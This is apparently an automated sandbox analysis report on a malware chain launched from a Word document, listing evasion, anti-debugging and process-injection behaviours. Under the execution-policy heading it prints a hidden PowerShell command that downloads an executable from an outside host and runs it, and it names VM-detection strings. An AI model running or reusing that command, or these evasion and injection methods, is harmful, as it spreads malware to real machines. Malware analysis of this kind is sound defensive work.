Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261DB0 rdtsc 12_2_00261DB0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FF00280EDC sldt word ptr [eax] 6_2_000007FF00280EDC
Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 16_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 17_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 18_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 25_2_0040D8FB
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 398
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\images.exe Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2412 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2264 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 1772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2988 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2396 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 1360 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2420 Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 2476 Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\images.exe TID: 2328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 2176 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 1948 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980 Thread sleep count: 398 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980 Thread sleep time: -4776000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411446 FindFirstFileW,FindNextFileW, 16_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 16_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411446 FindFirstFileW,FindNextFileW, 17_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 17_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411446 FindFirstFileW,FindNextFileW, 18_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 18_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411446 FindFirstFileW,FindNextFileW, 25_2_00411446
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 25_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, 16_2_0041154A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp Binary or memory string: OaUqUQEMueYeU
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: images.exe, 00000017.00000000.2226414690.0000000000152000.00000020.00020000.sdmp Binary or memory string: 1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp Binary or memory string: eZf1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261DB0 rdtsc 12_2_00261DB0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC81D5 LdrInitializeThunk, 25_2_03BC81D5
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess, 16_2_004060B0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00426222 mov eax, dword ptr fs:[00000030h] 16_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041EB27 mov eax, dword ptr fs:[00000030h] 16_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411B38 mov eax, dword ptr fs:[00000030h] 16_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411B3F mov eax, dword ptr fs:[00000030h] 16_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411E6D mov eax, dword ptr fs:[00000030h] 16_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00426222 mov eax, dword ptr fs:[00000030h] 17_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041EB27 mov eax, dword ptr fs:[00000030h] 17_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411B38 mov eax, dword ptr fs:[00000030h] 17_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411B3F mov eax, dword ptr fs:[00000030h] 17_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411E6D mov eax, dword ptr fs:[00000030h] 17_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00426222 mov eax, dword ptr fs:[00000030h] 18_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0041EB27 mov eax, dword ptr fs:[00000030h] 18_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411B38 mov eax, dword ptr fs:[00000030h] 18_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411B3F mov eax, dword ptr fs:[00000030h] 18_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411E6D mov eax, dword ptr fs:[00000030h] 18_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00426222 mov eax, dword ptr fs:[00000030h] 25_2_00426222
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0041EB27 mov eax, dword ptr fs:[00000030h] 25_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411B38 mov eax, dword ptr fs:[00000030h] 25_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411B3F mov eax, dword ptr fs:[00000030h] 25_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411E6D mov eax, dword ptr fs:[00000030h] 25_2_00411E6D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00406045 GetProcessHeap,RtlAllocateHeap, 16_2_00406045
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug
Source: C:\ProgramData\images.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\images.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB6118 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_03BB6118
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 16_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 16_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 16_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 17_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 17_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 17_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 18_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 18_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 18_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 25_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 25_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 25_2_00407D5E
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\images.exe Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 value starts with: 4D5A
Injects files into Windows application
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\microA.exe Jump to behavior
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 401000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 417000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 41C000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55B000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55D000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 120000
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 130000
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 16_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 17_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 18_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 25_2_0041405F
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C10353 keybd_event, 25_2_03C10353
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C1030F mouse_event, 25_2_03C1030F
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe Jump to behavior
